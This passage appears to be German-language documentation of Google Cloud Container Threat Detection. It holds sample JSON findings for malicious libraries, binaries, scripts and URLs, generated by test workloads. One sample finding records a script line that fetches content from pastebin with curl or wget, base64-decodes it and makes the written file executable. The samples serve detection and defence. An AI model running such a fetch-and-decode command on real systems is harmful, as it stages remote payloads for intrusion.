"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T19:51:06.618571329Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Ausführung: Schädliche Bibliothek geladen
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Added Malicious Library Loaded",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T21:40:14.340Z",
"database": {},
"eventTime": "2023-11-13T21:40:14.209Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/malicious_files/drop_mal_lib\"",
"size": "5005064",
"sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
"hashedSize": "5005064",
"partiallyHashed": false
},
"libraries": [
{
"path": "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
}
],
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/malicious_files/drop_mal_lib\"",
"\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.108.174.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-added-malicious-library\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.108.174.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.108.174.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.108.174.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "8",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "added_malicious_library_loaded"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699911603",
"nanos": 535268047
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1105/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:40:03.535268047Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Ausführung: Eingebaute schädliche Binärdatei ausgeführt
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Built in Malicious Binary Executed",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T21:38:57.405Z",
"database": {},
"eventTime": "2023-11-13T21:38:57.250Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "EXECUTION",
"primaryTechniques": [
"NATIVE_API"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/malicious_files/eicar_testing_file\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/malicious_files/eicar_testing_file\"",
"\"built-in-malicious-binary-818358caa95b6d42\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-built-in-malicious-binary\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "7",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "built_in_malicious_binary_executed"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699911519",
"nanos": 603253608
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1106/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.603253608Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Ausführung: Geänderte schädliche Ausführung von Binärprogrammen
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Modified Malicious Binary Executed",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T21:38:51.893Z",
"database": {},
"eventTime": "2023-11-13T21:38:51.525Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/malicious_files/file_to_be_modified\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/malicious_files/file_to_be_modified\"",
"\"modified-malicious-binary-da2a7b72e6008bc3\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-modified-malicious-binary\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "8",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "modified_malicious_binary_executed"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699905066",
"nanos": 618571329
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1105/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.084524438Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Ausführung: Geänderte schädliche Bibliothek geladen
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Modified Malicious Library Loaded",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T21:38:55.271Z",
"database": {},
"eventTime": "2023-11-13T21:38:55.133Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/malicious_files/drop_mal_lib\"",
"size": "5005064",
"sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
"hashedSize": "5005064",
"partiallyHashed": false
},
"libraries": [
{
"path": "\"/malicious_files/file_to_be_modified\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
}
],
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/malicious_files/drop_mal_lib\"",
"\"/malicious_files/file_to_be_modified\"",
"\"/tmp/modified-malicious-library-430bbedd7049b0d1\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-modified-malicious-library\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "8",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "modified_malicious_library_loaded"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699911519",
"nanos": 124151422
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1105/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.124151422Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Schädliches Script ausgeführt
{
"finding": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"state": "ACTIVE",
"category": "Malicious Script Executed",
"sourceProperties": {
"VM_Instance_Name": "INSTANCE_ID",
"Script_Filename": "FILENAME",
"Script_SHA256": "SHA_256",
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Container_Name": "CONTAINER_NAME",
"Parent_Pid": 1.0,
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Process_Creation_Timestamp": {
"seconds": 1.617989997E9,
"nanos": 1.17396995E8
},
"Pid": 53.0,
"Pod_Namespace": "default",
"Process_Binary_Fullpath": "INTERPRETER",
"Process_Arguments": ["INTERPRETER", "FILENAME"],
"Pod_Name": "POD_NAME",
"description": "A machine learning model using Natural Language Processing (NLP) techniques identified an executed bash script as malicious.",
"Script_Content": "(curl -fsSL https://pastebin.com||wget -q -O - https://pastebin.com)| tac | base64 -di | exit 0 | > x ; chmod 777 x ;",
"Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
test-4af235e12be6f9d9", "HOME\u003d/root",
"KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
"PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"KUBERNETES_PORT_443_TCP_PORT\u003d443",
"KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
"DEBIAN_FRONTEND\u003dnoninteractive",
"KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
"KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
"Container_Creation_Timestamp": {
"seconds": 1.617989918E9,
"nanos": 0.0
}
},
"securityMarks": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
},
"eventTime": "2021-04-09T17:39:57.527Z",
"createTime": "2021-04-09T17:39:57.625Z",
"propertyDataTypes": {
"Container_Image_Id": {
"primitiveDataType": "STRING"
},
"Pod_Namespace": {
"primitiveDataType": "STRING"
},
"Container_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Environment_Variables": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"description": {
"primitiveDataType": "STRING"
},
"Pid": {
"primitiveDataType": "NUMBER"
},
"Process_Arguments": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Container_Image_Uri": {
"primitiveDataType": "STRING"
},
"Pod_Name": {
"primitiveDataType": "STRING"
},
"Process_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Parent_Pid": {
"primitiveDataType": "NUMBER"
},
"VM_Instance_Name": {
"primitiveDataType": "STRING"
},
"Script_Content": {
"primitiveDataType": "STRING"
},
"Script_Filename": {
"primitiveDataType": "STRING"
},
"Container_Name": {
"primitiveDataType": "STRING"
},
"Script_SHA256": {
"primitiveDataType": "STRING"
},
"Process_Binary_Fullpath": {
"primitiveDataType": "STRING"
}
},
"severity": "CRITICAL",
"workflowState": "NEW",
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"projectDisplayName": "PROJECT_ID",
"parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parentDisplayName": "PROJECT_ID",
"type": "google.container.Cluster"
}
}
Schädliche URL erkannt
{
"findings": {
"access": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
"category": "Malicious URL Observed",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2022-09-14T21:35:46.209Z",
"database": {},
"description": "A malicious URL is observed in the container workload.",
"eventTime": "2022-09-14T21:35:45.992Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {
"uris": [
"testsafebrowsing.appspot.com/s/malware.html"
]
},
"kubernetes": {
"pods": [
{
"ns": "default",
"name": "CONTAINER_NAME",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/bin/echo\""
},
"script": {},
"args": [
"\"/bin/echo\"",
"\"https://testsafebrowsing.appspot.com/s/malware.html\""
],
"envVariables": [
{
"name": "\"PATH\"",
"val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"CONTAINER_NAME\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"LANG\"",
"val": "\"C.UTF-8\""
},
{
"name": "\"PYTHONUNBUFFERED\"",
"val": "\"1\""
},
{
"name": "\"PORT\"",
"val": "\"8080\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"IP_ADDRESS\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"IP_ADDRESS\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://IP_ADDRESS:443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://IP_ADDRESS:443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
}
],
"pid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"severity": "MEDIUM",
"sourceDisplayName": "Container Threat Detection",
"state": "ACTIVE",
"vulnerability": {},
"workflowState": "NEW"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Pod_Namespace": "default",
"Container_Name": "CONTAINER_NAME",
"Process_Binary_Fullpath": "/bin/echo",
"description": "A malicious URL is observed in the container workload.",
"VM_Instance_Name": "VM_INSTANCE_NAME",
"Pid": 1,
"Process_Arguments": [
"/bin/echo",
"https://testsafebrowsing.appspot.com/s/malware.html"
],
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Parent_Pid": 0,
"Process_Creation_Timestamp": {
"seconds": 1663191345,
"nanos": 7717272
},
"Environment_Variables": [
"PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"HOSTNAME=CONTAINER_NAME",
"DEBIAN_FRONTEND=noninteractive",
"LANG=C.UTF-8",
"PYTHONUNBUFFERED=1",
"PORT=8080",
"KUBERNETES_PORT_443_TCP_ADDR=IP_ADDRESS",
"KUBERNETES_SERVICE_HOST=IP_ADDRESS",
"KUBERNETES_SERVICE_PORT=443",
"KUBERNETES_SERVICE_PORT_HTTPS=443",
"KUBERNETES_PORT=tcp://IP_ADDRESS:443",
"KUBERNETES_PORT_443_TCP=tcp://IP_ADDRESS:443",
